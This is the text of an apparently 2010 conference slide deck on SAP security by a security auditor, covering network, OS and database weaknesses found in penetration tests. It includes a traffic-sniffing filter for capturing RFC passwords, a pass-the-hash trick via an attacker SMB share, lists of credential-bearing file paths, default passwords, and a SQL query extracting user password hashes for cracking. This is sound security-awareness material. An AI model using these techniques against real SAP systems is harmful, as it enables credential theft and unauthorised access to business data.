WIXLIB

Some notes on SAP SecurityAlexander Polyakov. PCI QSA,PA-QSADirector of Security Audit Department, Digital SecurityHead of Digital Security Research Group [DSecRG]a.polyakov@dsec.ru

Some notes on SAP securityWho is that guy?1.5 yrs – work in the Digital Security company now as Director of Security Audit Department2.3 yrs – Head of Digital Security Research Group3.1 yr - Expert council member of PCIDSS.RU4.Found a lot of vulnerabilities in SAP, Oracle, IBM solutions5.Wrote the first Russian book about Oracle Database security - “Oracle Security from the Eye of the Auditor. Attack andDefense” (in Russian)6.One of the contributors to Oracle with metasploit project7.Speaker at T2.fi, Troopers10, InfosecurityRussia, PCIDSSRUSSIA2010 Ruscrypto, Chaos Constructions (СС)The main interests and activities: ERP security assessment / research Web application and Database security assessment / research Penetration testing / Security assessmentManaging/Teaching Research group PCI DSS/PA-DSS assessment 2002—2010, Digital Security

Some notes on SAP securityDigital SecurityDigital Security is the leading Russian consulting company in the field of information security management, security audit andsecurity standards, such as ISO 27001, PCI DSS and PA-DSS compliance.The main activities: Information security consulting Business application security assessment Penetration testing Research center Security software development Information security awareness centerResearch CenterThe main mission of DSecRG is to conduct researches of different application and system vulnerabilities. The result of thiswork is then used by the experts of the Digital Security audit department for assessing the security level of information systemswith the use of active audit methods and also while carrying out penetration tests. 2002—2010, Digital Security

Some notes on SAP securityIntroMain problems in ERP securityERP-Enterprise resource planning is an integrated computer-based system used tomanage internal and external resources including tangible assets, financial resources,materials, and human resources.from Wikipedia ERP systems have a complex structure Mostly available inside a company not so muchpeople can test it instead of OS Windows for example Contain many different vulnerabilities in all the levelsfrom network to application Rarely updated because administrators are scared theycan be broken during updates 2002—2010, Digital Security4

Some notes on SAP securityIntroERP security problemsDevelopment 2002—2010, Digital SecurityImplementation4

Some notes on SAP securitySAP 2002—2010, Digital Security5

Some notes on SAP securityIntro SAP (Systems, Applications and Products in DataProcessing) is a German company devoted to thedevelopment of business solutions. Biggest ERP software vendor Provides different solutions: ERP, CRM, PLM, SCM,SRM, GRC, Business One SAP runs on multiple Hardware, Operating Systemsand Databases 2002—2010, Digital Security5

Some notes on SAP securityIntroBusiness applications like ERP, CRM, SRM andothers are one of the major topics within the field ofcomputer security as these applications store businessdata and any vulnerability in these applications cancause a significant monetary loss or even stoppage ofbusiness.Nonetheless people still do not give much attention to the technical sideof SAP security. 2002—2010, Digital Security5

Some notes on SAP securitySAPSecurity 2002—2010, Digital Security5

Some notes on SAP securitySAP Security from a vendor eyeSlide from one of the SAP presentations:“SAP Security Secure Business in Open /schumacher.pdf 2002—2010, Digital Security6

Some notes on SAP securitySAP Security from a vendor eyeSlide from one of the SAP presentations:“SAP Security Secure Business in Open Environments” 2002—2010, Digital Security6

Some notes on SAP SecuritySAP Security from the eye of avendorSolution: Security guides Security notes Security courses Administration courses Books 2002—2010, Digital Security6

Some notes on SAP SecurityIt is EASY! 2002—2010, Digital Security6

Some notes on SAP SecurityQuestions?Thanks 2002—2010, Digital Security6

Some notes on SAP SecurityWait 2002—2010, Digital Security6

Some notes on SAP SecurityKey security featuresSo you must read andunderstand all thosethings as a minimumto make our SAPsecure!Read about it from: Security guides Security notes Security courses Administration courses Books Sdn.help.sap Additional resources 2002—2010, Digital Security6

Some notes on SAP SecurityJust do it!So you JUST mustread and understandas a minimum allthose things to makeour SAP secure! Security guides - more than 200 documents 50 pages each Security notes - more than 330 documents Security courses - just 3 courses 500 pages each Administration courses - from 10 to 50 or more documents 300 pages each Books - more than 30 about administration & security Sdn.help.sap - many many pages Additional resources - unlimited 2002—2010, Digital Security6

Some notes on SAP SecurityAfter all .But the picture is wrong for a little. This is not money – This is your documentation 2002—2010, Digital Security6

Some notes on SAP SecurityRealSAP Security 2002—2010, Digital Security6

Some notes on SAP SecurityPlatformsProductsYour SAPimplementationAbstractionLevels 2002—2010, Digital SecurityApplications6

Some notes on SAP SecuritySAP Security overviewPlatformsProducts (only ERP) ABAP SAP R/3 4.6 JAVA SAP ERP Enterprise ABAP JAVA SAP ERP 2004 (ECC5) with NW 2004 SAP ERP 2005 (ECC6) with NW 2004sAbstraction Levels Network OS Database Security Application/Web application EPR Client-side 2002—2010, Digital SecurityYou must knowsecurity aspects forall possibleintersections!Applications Different OS Different Databases Different additional components6

Some notes on SAP SecuritySAP Security overview 2002—2010, Digital Security6

Some notes on SAP SecuritySAP Security: Pentester’s viewAbstraction Levels Network OS Database Additional Applications Internal SAP (BASIS) Client-side 2002—2010, Digital Security6

Some notes on SAP SecurityNetworkSecurity 2002—2010, Digital Security6

Some notes on SAP SecurityNetwork securityEncryption Password sniffing (passwords xored with known value in RFC)No traffic encryption by default (DIAG,Netweaver, visual admin, J2ee telnet, etc)Potocol vulnerabilities RFC protocol vulnerabilitiesGetting information (RFC Ping)Executing remote commands (RFCEXEC, SAPXPG, RFC START PROGRAM)Registering External serverInprooper components implementation Improper SAP firewall rules implementation (allow all) Network segmentation between users, administrators, servers, dmz 2002—2010, Digital Security7

Some notes on SAP SecurityNetwork security Example 1. RFC connectionsCapture SAP traffictcpdump -n -i eth0 'tcp[13] & 3 ! 0 and (( tcp[2:2] 3200tcp[2:2] 3300) or 5 ( tcp[2:2] 3600 tcp[2:2] 3700))‘ Find a user and decode password. A user has access to XI systemwithout business data Using transaction SM59 that can show all RFC connections there wasfound one connection to HR system with hardcoded credentials Credentials were of the remote RFC user created for data exchange This user is called ALEREMOTE had SAP ALL privilegesAs a result the auditor got access to all data in HR system 2002—2010, Digital Security8

Some notes on SAP SecurityNetwork security Example 2. MMC passwords sniffing SAP MMC is installed by default on port 50013 Used for remote management of SAP servers By default SSL is not implemented Administration password transmitted using basic auth (base64) By sniffing this password we can get full control over the server 2002—2010, Digital Security8

Some notes on SAP SecurityNetwork security Example 3. PassThehash throught RFC RFC functions can be called remotely You need a user and a password ALMOST ALL sap administrators don’t changepassword for user SAPCPIC Using his credentials we can call function thattries to read the file on our SMB share Gotcha! Hashes are stolen 2002—2010, Digital Security8

Some notes on SAP SecurityNetwork security Example 3. PassThehash throught RFC 2002—2010, Digital Security8

Some notes on SAP SecurityOS Security 2002—2010, Digital Security6

Some notes on SAP SecurityOS securityOS and application vulnerabilitiesAny critical vulnerability in OS or applications installed on SAP server can be usedto get access to OS and business DATA. Examples of OS vulnerabilities areeverywhere (securityfocus, milw0rm,exploit-db)OS specific security options NFS access. SAP data and binaries can be accessed by an anonymous userwith NFSOS access rights. Critical SAP files and Oracle data files may have insecurerights such as 755 or even 777Insecure rhosts. Remote access can be managed by rlogin from trustedservers thus getting access to one of SAP servers an attacker can access toothersPhysical access.Etc 2002—2010, Digital Security9

Some notes on SAP SecurityOS Vulnerabilities example (from OS to SAP) In one of the companies there was a Unix user for backup access which wascalled backup This user had a simple password (guess what :)?) After examining access rights there was found that any OS user had readaccess on the system data files where Oracle password hashes stored-rw-r--r-1 orats2dba1768014992 May 20 20:03oracle/TS2/sapdata1/system 1/system.data1An attacker can: access to other data files decrypt hash (using rainbow tables) or rewrite file with own hash 2002—2010, Digital Security10

Some notes on SAP SecurityOS Vulnerabilities. Sample critical filesThere are many critical files on SAP server that can be used by unprivilegeduser to gain access to SAP application: Database files (DATA encrypted Oracle and SAP passwords) /oracle/ DBSID /sapdata/system 1/system.data1 SAP config files (encrypted passwords) /usr/sap/ SAPSID / Instance ID /sec/* /usr/sap/ SAPSID / Instance ID /sec/sapsys.pse Configtool Config files (Encrypted Database password) perties \usr\sap\DM0\SYS\global\security\data\SecStope.key J2EE Trace files (Plaintext passwords) /usr/sap/ sapsid / InstanceID /j2ee/cluster/dispatcher/log/defaultTrace.0.trc ICM config files (encrypted password) \usr\sap\DM0\SYS\exe\uc\NTI386\icmauth.txt 2002—2010, Digital Security10

Some notes on SAP SecurityDatabaseSecurity 2002—2010, Digital Security6

Some notes on SAP SecurityDatabase securityMany SAP instances installed with Oracle database. As it’s known Oracledatabase has many security problems in all the areas with default installation.Briefly: Database vulnerabilities Many default passwords Default SAP passwords (SAPR3/SAP ) Password policies such as password length and locking are not installedby default Security properties such as REMOTE OS AUTHENT Listener security (for example latest buffer overflows that give remoteaccess to OS) Many many othersDirect access to the Database means full SAP compromise! 2002—2010, Digital Security11

Some notes on SAP SecurityDatabase security example 1 In SAP R3 4.71 installed with Oracle 9i there was found userDBSNMP with password DBSNMP He has “SELECT ANY DICTIONARY” rights and he has access todba users where the Oraclepassword hashes stored. An attacker can try to decrypt itand get access to the databasewith SYS or SYSTEM rights. 2002—2010, Digital Security12

Some notes on SAP SecurityDatabase security example 2 In another SAP installation there was found user sapr3 with defaultpassword SAP. Using this credentials he was given access to the table with thepassword hashes of all SAP users:select bname, bcode, uflag from sapr3.usr02 where mandt '000'; Using this hashes and the latestversion of JohnTheRipper 2002—2010, Digital Security12

Some notes on SAP SecurityDatabase security example 3. REMOTE OS AUTHENTNO Comments 2002—2010, Digital Security12

Some notes on SAP SecurityApplicationsSecurity 2002—2010, Digital Security6